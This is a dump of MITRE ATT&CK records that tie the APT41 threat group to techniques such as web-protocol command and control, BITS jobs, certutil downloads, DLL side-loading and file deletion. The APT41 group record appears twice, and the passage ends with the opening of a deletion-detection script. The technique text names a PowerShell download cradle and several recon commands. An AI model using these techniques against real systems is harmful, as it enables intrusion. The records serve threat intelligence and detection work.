----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--4aa86179-d9e9-43dd-b2a2-75e77a832150
revoked : False
technique : Web Protocols
technique_description : Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used svchost.exe and [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--84dc2fd1-a443-4ce6-866a-c58cffc1b0f3
revoked : False
technique : Service Execution
technique_description : Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content, by executing either a new or a modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1569.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) executed <code>file /bin/pwd</code> in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--a8b93875-6ad4-492e-afa1-0549ada7d7ca
revoked : False
technique : Unix Shell
technique_description : Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.004
matrix : mitre-attack
platform : ['macOS', 'Linux']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
permissions_required : ['User', 'root']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has executed <code>file /bin/pwd</code> on exploited victims, perhaps to return architecture-related information.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--d9416afb-0aeb-4ee3-bd96-dc331f40f37d
revoked : False
technique : File and Directory Discovery
technique_description : Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1083
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [ftp](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)
relationship_id : relationship--2cd69fd0-d5ad-41db-aaee-fd58e46bfaaa
revoked : False
technique : File Transfer Protocols
technique_description : Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--e7fc5a89-f5a7-432f-a885-6b9532153e7e
revoked : False
technique : Exploit Public-Facing Application
technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1190
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--d316289b-26fa-49d7-8ed0-3fa56cc858b7
revoked : False
technique : BITS Jobs
technique_description : Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS-enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days, and it can be extended) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1197
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Service: Service Metadata']
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)
|
||
relationship_id : relationship--f234930f-f7d1-458d-8c79-c73538990f97
|
||
revoked : False
|
||
technique : Multi-Stage Channels
|
||
technique_description : Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
|
||
|
||
Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.
|
||
|
||
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1104
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--b42c23c9-99f4-4b1f-91e2-a945a119fe98
|
||
revoked : False
|
||
technique : Ingress Tool Transfer
|
||
technique_description : Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
|
||
|
||
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
|
||
|
||
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.
|
||
|
||
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1105
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Network Traffic: Network Connection Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)
|
||
relationship_id : relationship--f1a9d2b9-f5ec-4119-b3b5-8b46085c01b5
|
||
revoked : False
|
||
technique : Obfuscated Files or Information
|
||
technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
|
||
|
||
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
|
||
|
||
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
|
||
|
||
Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1027
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the <code>net share</code> command as part of network reconnaissance.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--4f6e677d-427b-4342-b35c-57f4f3ad4ff8
|
||
revoked : False
|
||
technique : Network Share Discovery
|
||
technique_description : Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
|
||
|
||
File sharing over a Windows network occurs over the SMB protocol.(Citation: Wikipedia Shared Resource)(Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all share points used for SMB services.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
|
||
technique_id : T1135
|
||
matrix : mitre-attack
|
||
platform : ['macOS', 'Windows', 'Linux']
|
||
data_sources : ['Process: OS API Execution', 'Command: Command Execution', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has enumerated IP addresses of network resources and used the <code>netstat</code> command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--a70bd01d-1d79-44e7-afe4-3a83e5a8d70c
|
||
revoked : False
|
||
technique : System Network Connections Discovery
|
||
technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
|
||
|
||
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
|
||
|
||
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
|
||
technique_id : T1049
|
||
matrix : mitre-attack
|
||
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']
|
||
data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--bcbc885e-c1ae-4e69-a72c-22900403bae3
|
||
revoked : False
|
||
technique : Exploitation for Client Execution
|
||
technique_description : Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system, because they can be used to gain access to that system. Users expect to see files related to the applications they commonly use to do work, so those applications are a useful target for exploit research and development because of their high utility.
|
||
|
||
Several types exist:
|
||
|
||
### Browser-based Exploitation
|
||
|
||
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
|
||
|
||
### Office Applications
|
||
|
||
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
|
||
|
||
### Common Third-party Applications
|
||
|
||
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
|
||
technique_id : T1203
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'Windows', 'macOS']
|
||
data_sources : ['Process: Process Creation', 'Application Log: Application Log Content']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate executables to perform DLL side-loading of their malware.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--ad3eae0f-becd-4ed8-94cf-40a4e1a06a9d
|
||
revoked : False
|
||
technique : DLL Side-Loading
|
||
technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
|
||
|
||
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1574.002
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deleted files from the system.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--56b47ce2-9baa-421b-9187-c780615b97de
|
||
revoked : False
|
||
technique : File Deletion
|
||
technique_description : Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
|
||
|
||
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
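Because `del` and `rm` run thousands of times a day on any fleet, a useful detection for this technique has to look at how the deletion is done rather than that it happened. The following is an added example, not MITRE text or APT41 code; the command lines are constructed. It classifies command-execution records into the three shapes an intruder's clean-up tends to take: a secure-wipe utility such as SDelete, forced or recursive deletion under a staging directory, and the delay-then-delete chain a dropper uses to remove its own file after exit.

```python
"""Classify deletion commands in command-execution telemetry (T1070.004).
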